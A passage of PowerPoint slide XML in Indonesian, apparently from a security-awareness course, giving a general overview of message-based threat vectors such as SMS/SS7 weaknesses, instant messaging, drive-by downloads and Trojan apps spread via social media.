              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Signaling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> System 7 (SS7). SMS dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SS7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh handset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SIM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Instan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (IM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows, Android, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> iOS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan video plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Malware Web dan Media Sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilampirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disajikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unduhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unduhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> drive-by). Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Trojan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melemahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
